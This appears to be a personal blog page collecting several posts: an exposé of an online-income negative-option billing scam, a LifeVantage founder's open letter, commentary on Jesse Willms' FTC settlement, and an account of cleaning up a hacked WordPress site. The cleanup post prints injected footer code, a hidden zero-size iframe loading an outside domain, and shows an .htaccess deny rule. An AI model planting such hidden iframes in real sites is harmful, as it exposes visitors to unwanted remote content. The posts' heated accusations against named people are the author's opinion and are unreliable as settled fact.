Huge parts of the web are off limits to bulk snooping by Corporations and Governments. We are resetting the net!
That Was Epic!
Today, we took back privacy and blocked government surveillance. It’s still not possible to be totally safe on-line. But we have made it harder. Much Harder. A host of well-known internet names have not only pledged support for online freedom, privacy and personal security – they’re actually doing it right now! See below!
For myself, you can find me here for a few weeks. After this time, I will be still operating as a relay, but operating anonymously. There will be a different fingerprint and different ports – currently I’m using fairly standard ports. So why make it easy for governments and corporate snoops. Make it hard. Make it harder. Make bulk snooping a thing of the past.
Well, typing the URL directly takes me to workingfromhome22.com! This is it!
Cunningly, you’ll note that it’s pulled out my home-town as Bournemouth (where I live) with that awful “mom” Americanism! No-one in the UK addresses their mother as mom… I mean, FFS?
The webpage links, containing the disreputably used graphics of Thomson, Reuters, CNBC and NBC Universal all point to http://workinghome22.com/go.php, which is of course in this domain. So let’s click it, shall we?
Well, pctrck.com is trying to load, but not much else.
Reversing then trying to exit workinghome22.com produces a pop-up of dubious functionality! Check the words – there’s no cancel button!
I did however manage to successfully close this page following that. Whew!
Now Back to onlineincnow.com
The previously mentioned http://onlineincnow.com/2/?aff_sub=72 is located in the USA.
So What Is It Up To?
OnlineIncNow.com Whois Record
Good Question! A WHOIS puts the registrant in China with the DNS servers in Russia!
As I mentioned earlier, the similarity of the scamminessof this thing is just like the Google Treasure Chest/ Google Money Tree / PWW scams of old.
The site is plastered with the logos of well known businesses to ad an air of authenticity to things (just as the original hook sites used The Guardian Newspaper and CBS in the same way) yet at the bottom of the page they disingenuously ad:
This site and the products and services offered on this site are not associated, affiliated, endorsed, or sponsored by NBCNEWS, ABC, USA Today, CNN or Fox News, nor have they been reviewed tested or certified by NBCNEWS, ABC, USA Today, CNN or Fox News.
onlineincnow.com T&C Screenshot
Despite all this, it is of course bollox set to deceive. In fact, it now appears that it’s the well known negative option scam, used by Pacific Webworks (PWW) and Jesse Willms to good effect until they were found out.
Let’s see how this pans out, shall we?…..
Check out the T&C page from the tiny link in the page footer – screenshot on the right.
They say that the applicable law is the State of Florida.
You will become a “member” and the key phrases are here:
You must register as a “Member” with Online Income Now to access certain functions of the website. You must provide current, complete and accurate information about yourself (the “Registration Data”) when registering as a Member. You agree that such information is truthful and complete. You agree to maintain and keep your Registration Data current and to update your Registration Data as soon as it changes. You are responsible for maintaining the security of your password. Online Income Now is not liable for any loss that you suffer through the use of your password by others. You agree to notify Online Income Now immediately of any unauthorized use of your account or other breach of security known to you. You also, by becoming a Member, agree to report violations of these Terms and Conditions by others to Online Income Now.
For a limited time only, the cost of this product is $97.00 ( usual price $299.95 ) and every 32 days thereafter you will be billed the member’s only price of $9.95 for the monthly use.
MATERIALS PROVIDED TO Online Income Now OR POSTED AT ANY Online Income Now’s WEB SITE
Online Income Now does not claim ownership of the materials you provide to Online Income Now (including feedback and suggestions) or post, upload, input or submit to any Online Income Now Web Site or its associated services (collectively “Submissions”). However, by posting, uploading, inputting, providing or submitting your Submission you are granting Online Income Now, its affiliated companies and necessary sublicensees, permission to use your Submission in connection with the operation of their Internet businesses including, without limitation, the rights to: copy, distribute, transmit, publicly display, publicly perform, reproduce, edit, translate and reformat your Submission; and to publish your name in connection with your Submission.
You’ll see that “Online Income Now” will:
make you a “member” (of what?)
and you will be regularly billed, (why?)
and that for anything you post, upload etc (wah? whadya mean? Where is this uploading?), “Online Income Now” will take no responsibility for what you do!
…………….which is curious as you don’t know what you’ll be doing and they have invited you to do it in the first place!!!
Now Lets Click The Link! Follow that Opportunity!
2 Spots Left!
Amazingly (sarcasm alert) there are two “spots” left in my area! This is the page… http://onlineincnow.com/2/index2.php
Michelle Johnson is the “guru” who will tell me everything! So what do I do? I have two options:
Let’s Try Backing Out, Shall We?
Cannot Backout From OnlineIncNow 2
Cannot Backout From OnlineIncNow
Well of course, they won’t let me. It takes two goes to get out and the first one completely takes over the browser! Bad. This is B.A.D.
Ah, well. Finally escaped.
Let’s Try Clicking to the Signup Page, Shall We?
secure.onlineincnow.com Data Entry Screen
I decide on my name, “Jobless Jake” and a random phone number…. The website is now https://secure.onlineincnow.com/2/cc_97.php
What I see is bad, really bad, and any attempt by this pack of jokers at saying they don’t run a negative option scam is now revealed on this sign-up page!
The scam is now revealed for what it is – a negative option scam! Read it carefully….. They expressly say;
By enrolling, you will be charged a one-time fee of $97.00
In teeny-tiny letters, note!
But remember, right back buried in the T&C’s they say;
every 32 days thereafter you will be billed the member’s only price of $9.95 for the monthly use.
This is expressly against the FTC code and laws in most countries. If any extra charges are to be levied for any service or goods, they should be expressly stated on the sign-up page where the customer first enters their financial details.
Gotcha! You Bastards!
Okay, I’ve Had Enough of This. I’m Off!
“Not so fast, young Jobless Jake”, say onlineincnow.com……!
Cannot Backout From OnlineIncNow 3
They’ve an extra 20% off plus and extra bit of webpage-erese! The screenshot says it all, though it wasn’t the end of it. I had one more “Leave Page” option like the earlier one above.
Roll on the FTC. They’ve got to weigh in on these sharks soon.
Paul Myhill’s Open Letter On Facebook
Update on 24 April 2012
Rather than a comment, (which isn’t so taggable and relevant within search engines), here’s Myhill’s open letter (open – geddit? – in the fullest meaning of the word). Text follows below.
OPEN LETTER TO MY DEAR LIFEVANTAGE FAMILY
Needless to say, the company and I are not on good terms right now. Quite frankly, Doug Robinson’s email to the LifeVantage distributors is fraught with error and misrepresentation. In fact, he gave very little attention to me personally on this matter, hardly exchanging a word with me concerning it. He simply didn’t have the time for me.
It is very well documented that the company was founded on a pledge to give shares, and a percentage of profits, to the charitable cause that it helped to start – rescuing orphaned and abandoned children from being abused, exploited, trafficked and enslaved. This was my “Why?” for joining Bill Driscoll in starting LifeVantage in the first place . . . and it is a cause that he graciously took on as his own and championed also. I’m sure he’s getting many hugs in Heaven as a result of the 15,000 children who are free from slavery today because of our work together.
I will be more-than-willing to make public all that documentation, especially since it was all public information to begin with. This charitable pledge was also the basis for which I assigned my invention (not Dr. McCord’s invention!) to LifeVantage. As soon as Bill and I assigned the patent to LifeVantage the pledge was sadly taken out of company materials, almost immediately. I naturally felt quite betrayed. Again, I can provide full documentation supporting this and it can be easily verified in the public record – through company press releases, investor presentation materials, SEC filings, etc. My resignation letter was also a matter of public record and alludes to the fact that this pledge – which was foundational to the company and my very involvement in it – needed to be kept, otherwise it would represent a promise broken to the original founders and all of LifeVantage’s stakeholders. The erasing of the pledge from company materials was the main reason for my departure, which the original Board and transition management team can certainly attest to. I was quite the thorn in their sides, constantly verbalizing the need to keep the pledge. As such, there is no disputing the existence of the original commitment. It’s simply undeniable.
I have been quite clear in my communications with LifeVantage management that the company still owes the charity now known as Traffic Jam 100,000 shares as part of its original pledge to match the Founders’ donation of shares to that same charitable vehicle. This amount was supposed to match Bill Driscoll’s gracious donation of 100,000 shares that came in a couple of months late. I’m sure if he were alive today he’d be greatly disappointed that the company never followed through on that commitment . . . and other commitments. Bill and I had our differences, but I also owe it to him as my brother-in-arms to get his shares matched, as he fully expected would be done when he made his generous gift in the first place. I owe it to his memory and legacy. And I owe it to his family – to see more children rescued because of his gift and defense of the pledge.
Despite the implication made in Doug’s letter, I never approached the company to ask anything for myself. In fact, it was David Brown who suggested that I become a “Goodwill Ambassador” for the company with a job role that would give me a greater platform to share the “correct” company history and bring attention to the fine work of the Traffic Jam Campaign. It was through that process that compensation (as with any job) was sought to channel to Traffic Jam. I have quite a few emails that show that this compensation was for the purpose of supporting the work of Traffic Jam. I’m on record multiple times stating that I gave everything away . . . and would give it away again.
It is with great sadness that I write this on the eve of my Birthday – not exactly the “gift” I was hoping for . . . or hoping to give. Since 2008, I have been pleading with the company to correct its marketing materials – to reflect that Joe is not the “Inventor” or “Creator” or “Scientist behind” Protandim; that Protandim wasn’t “developed after 40 years of research;” and that it didn’t consist of a “laundry list” of 40 ingredients that Joe whittled down to the current formula. This is all simply untrue. I’m sure the company will try to put some sort of further spin on this now and try to convince people otherwise, but the truth is the truth and will always come out in the end. Darkness can’t hide from the light.
The CORE botanical formula I forwarded to Joe included the current five botanicals, plus one additional one – all in the EXACT same proportions/weights as the current formula (all 1/3 of the original to get it into one pill), but with Milk Thistle subsequently bumped up at my suggestion. The other ingredients were part of an “all-in-one” (multi-formula) addition to that CORE botanical formula that I developed. Given such indisputable facts (and that the initial patent was filed one month before we even met Joe), how am I NOT the creator? How is Joe THE creator? The simple email record, and even a letter from Joe himself, clearly show that the current company communications are downright false and misleading . . . and, in the eyes of many, perpetuate an ongoing fraud – one that the SEC and FTC should be made aware of.
I initially stated that “nobody lied,” desiring to give this current management team the benefit of the doubt and chalking it to human error and the discontinuity of company management in general. But then, month after month went by with the same erroneous materials still being widely distributed by the company, despite their own admission to me that Joe isn’t the creator. These same materials are on the company website TODAY. I just don’t get how a company can keep doing that, with full knowledge that the materials are sending the wrong message to current and new distributors. Many times I wrote emails (which I’d be happy to share with you) and each time nothing was done to take down the offending materials.
I’ll be glad to once again share that whole “Protandim Development History” with you, which is backed up by meticulous documentation, the full email record, plus personal notes and commentaries. It spanned over 20 blog entries. I’m an “open book.” I had nothing to hide. I shared it all.
I’m sure, though, that if I were to re-post Protandim’s development history, the company would claim that I was then “giving away company secrets” and would once again try to silence the true history of the product’s creation – MY creation of Protandim – that occurred for almost ten months before I even met Joe. The reality is that the company misrepresentations have gone on for so long now that they have no choice but to try to silence the truth. Just you wait and see. I can almost hear the “cease and desist” letter being typed up right now. And I can almost picture the new “watered-down” version of the history that the company will now come up with.
Doug mentioned in his letter that I found the company response unacceptable. Well, one of those unacceptable conditions was that I sign a new set of releases (to silence me telling the true Protandim story again) and that I pull down my “LifeVantage / Protandim Founder’s Page” on Facebook which, of course, would be in addition to my blog that was already pulled down. Do you see the common theme here? Silence. Silence. And more Silence. I’m a high-justice person who stands for truth and integrity and, despite the company trying to buy that silence by offering for Traffic Jam to be featured at convention, I told them that I couldn’t in good conscience do that. I’m not signing away my voice. My “Founder’s Page” stays. My voice stays. And my appeal to get the company to meet its commitments . . . stays.
Do you want a company of integrity? Well, then, don’t let them silence the truth any more. Protandim wasn’t an “idea” that Bill and I took to Joe. It was a full formula that even Joe stated in a letter was almost at its “final embodiment.” And the company’s charitable pledges to Traffic Jam wasn’t an “idea” that I just came up with. It was represented in multiple press releases and SEC filings and collateral materials. If you don’t believe me, go to EDGAR and check yourself for at least the SEC part of it.
Ever wonder why the company took down all the archived press releases? Because it backs up what I’m saying and what I’ve been asking, not for myself, but on behalf of trafficked and enslaved children.
Given the erroneous wording in Doug’s email, I can only assume now that the company has chosen the issue of the 100,000 shares to try to discredit me – making it sound like I’ve been making selfish and unreasonable demands of the company – while at the same time trying to discredit the true history of Protandim’s development. Doug, of course, fails to mention in his email that the “great deal of material” that I posted on the Internet concerning “my view” of that development was 1.) Taken down by me as a sign of “good faith” and 2.) Was only posted in the first place after I reached out to the company multiple times beforehand – with no response.
I’m not sure how Doug can call it “my view” of Protandim’s development anyway, considering that it included hundreds of emails (that were copied or sent to dozens upon dozens of people) as well as a number of other source documents that were widely circulated. It’s not just “my view,” as demonstrated by the substantiated, well-documented evidence. Of course, if the company has its way, you probably won’t see any of that document and you’ll just have to accept Doug’s words that it was simply “my view” of events. Where was Doug during the development of Protandim? Who is he to challenge the clear evidence? Can he not see the patent was initially filed a full month before Joe even came into the picture? Does he not see whose name is on the patent?
For months, I’ve taken steps of “good faith” and have expected the company to do the same – to act in “good faith” to take down the erroneous marketing materials that were propagating that Joe was the inventor/creator of Protandim. Sadly, the company never reciprocated. The 100,000 share issue, unfortunately, has now become the easy point of contention that allows LifeVantage to not have to give credit to me for my invention. By making it so public and contentious, LifeVantage now has a convenient excuse to not have to include Bill and me in our rightful place in the company history. Something that should have been celebrated can now be easily swept under the rug because I’m the “bad guy” with “unreasonable” expectations who asked the company to honor its commitments. It now allows them to feel better about themselves somehow – for so long being negligent in getting the real story about Protandim’s development out there; for so long casting me in a “false light” by commission and omission; for so long keeping up the erroneous materials to the point of malice and great hurt.
Company of integrity, Doug says? How about keeping its original promises to match the founders’ shares to rescue children? How about keeping its original promises to give 10% of pre-tax net profits away for children and related humanitarian causes? How about filing an 8-K correction notice with the SEC every time the erroneous message of Joe being the “creator” went out? How about the promise to correct the development history while at the same time keeping up the offending materials that lead people to believe Joe was the inventor? How about David’s promise to “make it happen” for me to have a “Goodwill Ambassador” role with the company, to help further the purposes of Traffic Jam? How about the company’s constant encouragement for distributors to use the copyrighted material of ABC News for commercial purposes? How about all those big distributors who came over with down-lines allegedly “stolen” from Zrii? How about ALL the mentions of diseases when it’s clearly not permitted in the marketing of a supplement?
Integrity? Company of integrity? Actions speak louder than words.
This is a very sad day for me folks. The “petition” that Doug mentioned in his letter was merely me throwing up my arms in bewilderment and wondering why on earth the Board wasn’t fulfilling the matching pledge with a measly 100,000 shares when the evidence was so clear that 100,000 shares were missing (Believe me, I was asking for these shares long before the recent run-up in price). Even a math flunkey could see that the numbers didn’t add up and 100,000 shares were still owed. Instead of bringing the match to completion, with an amount of shares that pales in comparison to the fat stock options the executives are getting, they chose to make this big issue out of it. It could have been a cause for celebration. Instead, the company has chosen to create yet another public relations nightmare. I didn’t ask for that. They did it. And I’m baffled by it.
I started off with 5 million shares. Why on earth would I make all this fuss about 100,000 shares if it were not true? I’m a man of principle and the principle-of-the-matter is the shares are still owed. Gosh, by their reaction, you’d think I asked for the moon.
I merely responded by saying that I would put out the public information and ask distributors to let their voices be heard – for integrity and common sense. But somehow that’s now something portrayed as me being devious and destructive. Hello? Why would I try to destroy the stock of the company I’m trying to get shares from? Hello?
Conversely, I don’t believe the LifeVantage Board has acted in its fiduciary duty in this matter. I believe they are acting in a destructive manner. Why on earth would they bring about such a disruptive episode in the midst of such growth and promise? The missing shares are soooooooo obvious that they are missing from the match. I gave 200,000 shares. Bill gave 100,000 shares. the company gave 200,000 (matching mine) and, hello again, Bill’s shares didn’t get matched. 100,000 shares missing. You don’t need a mathematics degree to figure that one out. Why would the Board put so much at risk – the airing out of this laundry – instead of just issuing the shares to help rescue kids?! And celebrating it!
. . . Unless, of course, they were needing something to make me look “bad” or “unreasonable” so they don’t feel so bad about the incorrect company communications about who invented the product. And to release themselves from an obligation to correct that history in a way that celebrates Bill’s and my involvement.
. . . Now they can just quietly remove the “creator” tag from Joe and hope that nobody notices. Just like they did when they removed the “inventor” tag from him.
Doug’s letter concludes by asking distributors to not get involved in anything that “disparages” the company. Wow. I asked the company to honor its commitment with a measly 100,000 shares to stop 11 year-olds from getting raped 20 times per day; to stop 7 year-olds from having to shoot their parents before being forcibly conscripted into a child militia. Now, if any distributor goes along with supporting what is clearly in the public record, and honoring their own conscience to see the pledge fulfilled for children such as these, they are in violation of their distributor’s agreement. Seriously?
Looks like the strong arm of silence rearing up again.
My apologies for rambling on in this open letter. Obviously I’m a passionate person – the same passion that brought Protandim into being in the first place. And, obviously, I’m quite upset right now – not just by these events, but how they’ve now been represented in Doug’s email.
Unfortunately, it’s the distributors and the children who lose out because of the Board’s baffling conclusion and Doug’s irrational choice to send out his email. Quite wreckless, if you ask me. Certainly not acting in the best interests of the shareholders. They turned a public relations celebration into a public relations nightmare.
I apologize to all of you that it has come to this. It certainly wasn’t my intention.
I want you all to know that I love you all and do indeed wish you the best. I will STILL use my “Founder’s Page” on Facebook as a place of encouragement and, given this recent turn of events, as a place of clarity and truth.
So there you have it. Since this time, Myhill has been sat on by Lifevantage (as it turns out a kind of double-blackmail) and then stated that the shares were the thing to buy. Following this, Lifevantage have made public pronouncements about their charitable donations to Myhill’s charitable organisation(s) and there’s now, apparently, a kind of Machiavellian sweetness and light between them.
But whatever: the business is still a snake-oil pyramid scheme founded on flawed and discredited “science” and promoted by MLM-hopping get-rich-quick wide-boys. For more on these recent developments and a fuller history of investigations into the topic, see a few of LazyMan’s postings here:
…….I won’t steal any more of Lazyman’s thunder and there much, much more on his site. But from top to bottom, the volunteers and employees of all the charities financed by Myhill and/or Lifevantage should examine their hearts and ask themselves;
What value is there to a charity when it’s financed from deception?
So what if Myhill has had his photo taken with Elton John or whoever.
So what if Myhill plugs;
Paul Myhill Entertainer Plugs
“Meetings getting scheduled with Lady Gaga, Justin Timberlake, Justin Bieber, Slash, Myles Kennedy, and many more. The TRAFFIC JAM Campaign (Stop Child Trafficking & Slavery) will be rocking this summer!”
Our Prime Ministers and Presidents are often photographed with the pariahs of the world. Elton is one of the world’s biggest self-publicists and spend-thrifts. So is Gaga. So, so what? There is no validation there.
It’s still a charity founded on deception. It may have good aims. It may be correctly financed and regulated – though Vogel has shed great doubts over this (See here, here, here, here and here). But it is financed by a pyramid scheme based MLM using a product with no proven benefit as the bait on the hook.
Instead of being stripped completely of his ill-gotten gains and being chucked in the slammer for a few years, he has reached a settlement whereby no admission of guilt has been made!
This is exactly what I suggested would happen, because the self-proclaimed philanthropist Jesse will do anything, absolutely anything, to stay in business.
To me this isn’t true victory.
He’s not been punished by the law which explains the lingering smell I have, possibly due to his key lawyers having previously worked at the FTC. Maybe it is the old boy network? Whatever.
The millions (yes, millions the FTC say) of people scammed may be temporarily amazed at the $359-million judgement, but seeing as how the original complaint was for over $450m they’ll soon realise that he’s got off with $100m! However it’s worded, Willms has weaselled out of any admission of guilt, which means he’s still in business.
What cunning plans could now be afoot, with $100m to back them up, they’ll wonder? It’s like The Return of Fu Manchu.
Almost 4 Million Questions
Willms’ Blog Release – notice how he promotes the $25k ‘gift’, but not his $359m settlement?
Like me, the millions scammed by him will be questioning how he isn’t, right now, being butt-plugged in Huntsville, instead of having 7 days to calmly surrender his bank accounts to prove that he can stump up the $359m negotiated, meanwhile making gratuitous comments about better business practices in future whilst still singing the praises of his $1000 philanthropic gestures.
True, Willms et al have to hand over all their money and have promised as much under sufferance of perjury.
True, they all have to notify the FTC of their whereabouts for the next 20 years and all their business proceeds. They have to keep compliance records for 5 years.
True, Willms must tell the FTC his jobs, phone numbers, businesses in which he’s involved etc
True, Willms et al have 180 days to hand over all details of all their businesses and contacts within those businesses.
True, Willms for the next five years must give a copy of the FTC order (the pdf attached) to each person he does business with and that they have 30 days to sign and return it to the FTC.
True for all of that, but, Willms can still do business and who knows if any of his victims will get recompensed. A lot of the order’s wording is to ensure that the US & Canadian Inland Revenue get their taxes from Willms et al for the last three years. What about the little people?
This article guesses that victims won’t see any of the cash. My guess is that only those people that actually complained to the FTC will get cash, which is why it’s so important to complain, as I’ve suggested for years.
This article thinks that he’s had to hand over everything (though I can’t see how they justify that, given what we know about business secrecy in Nicosia, Cyprus), yet it also points out that the bans that Willms has had to acquiesce to only apply to the USA! That is, there’s nothing at all saying Willms can’t set up anywhere else, like Korea say, and hammer the world from there!
MSNBC opinionate that Jesse Willms will need to look for a new line of work…..
I, of course, beg to differ, because:
He settled with Microsoft, yet carried on trading as usual.
He settled with Symantech, yet carried on trading as usual.
He settled with Oprah Winfrey, yet carried on trading as usual.
He settled with Dr Oz, yet carried on trading as usual.
He settled with Google yet carried on trading as usual.
Now he has settled with the FTC. I’d be amazed (yet obviously pleased) if he changed the patterns of a lifetime. Only time will tell.
On top of this, Willms himself states on his blog entry (see screenshot above);
We are working to resolve issues relating to past marketing practices for products that our company no longer sells. Through this process, we have taken steps to assure(sic) that our business practices are in full compliance with the law. We are excited by the opportunity to continue giving customers access to a variety of products and services at significant savings. – n.b. the emphasis is mine.
…..which looks to me that it’s more web business, not a change in business type.
It’s a victory, but not the one the whole world wants. It all leaves a bad, lingering, smell…..
Circle Media Bids Limited, also d.b.a. SwipeBids.com SwipeAuctions.com, and SellofAuctions.com;
Coastwest Holdings Limited;
Farend Services Ltd;
JDW Media, LLC;
Net Soft Media, LLC, also d.b.a. SwipeBids.com;
Sphere Media, LLC, also d.b,a SwipeBids.com and SwipeAuctions.com;
I’ve listed these so that they appear in search engines and so that people realise the lengths of obfuscation that Willms has used in his activities.
I say Willms, because he is recognised in the judgement as the prime mover in the scams. He has been pinched for hundreds of millions – the others have been collared for a few tens of thousands at most each, some, for nothing, because (how embarrassing is that for them?), they have nothing – yes really!
How annoying for the two Gravers that their payments are about the same as young Jesse Wilms’ fish tank! ($30,000 in 2010 he paid for it)
I wonder how the Children’s Hospital Boston and the Gulf Coast Restoration Fund both realise that they’ve got less from philanthropic Jesse than he’s spent on his fish tank? ($25k each) I wonder how they feel now, knowing that this money was stolen from ordinary consumers, people like themselves?
A few days ago I got hacked. I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.
This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess! The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website. This is how:
<Limit GET POST>
deny from 126.96.36.199/8
allow from all
However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….
A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager. (In the end, this was my failing and I will not rely on the thing again!)
A search through my database also turned up zero.
TCPView is a download from Sysinternals.com (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere. This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 188.8.131.52…… This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.
Even when closed by TCPView, the connections would immediately start up again to the same IP address, 184.108.40.206 (manually closing strangelyperfect.tv stopped the connections).
I had of course previously changed my FTP, mySQL databaase and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer! On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)
Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom. This is the code as it was when I checked:
<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
This was then easily traced to the footer.php file in my theme, Suffusion.
It was simply stripped out and the website then worked fine….. but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean! I then uploaded a whole clean Suffusion theme in it’s entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.
A recheck on Securi shows my website to be okay now. See screendump below. I’ll be using Securi a lot more!
Over the last couple of days the strangest thought has plagued me. Two simple ugly words have kept emerging, only for me to lock them out and ridicule them as bizarre. Simon’s dead. Just to write it down feels like … Continue reading →
If you ever needed confirmation that the UK is not run by a shadowy cabal of sinister plotters but a bunch of chinless fucking idiots then the upcoming Digital Economy Bill is a good place to start. As well as … Continue reading →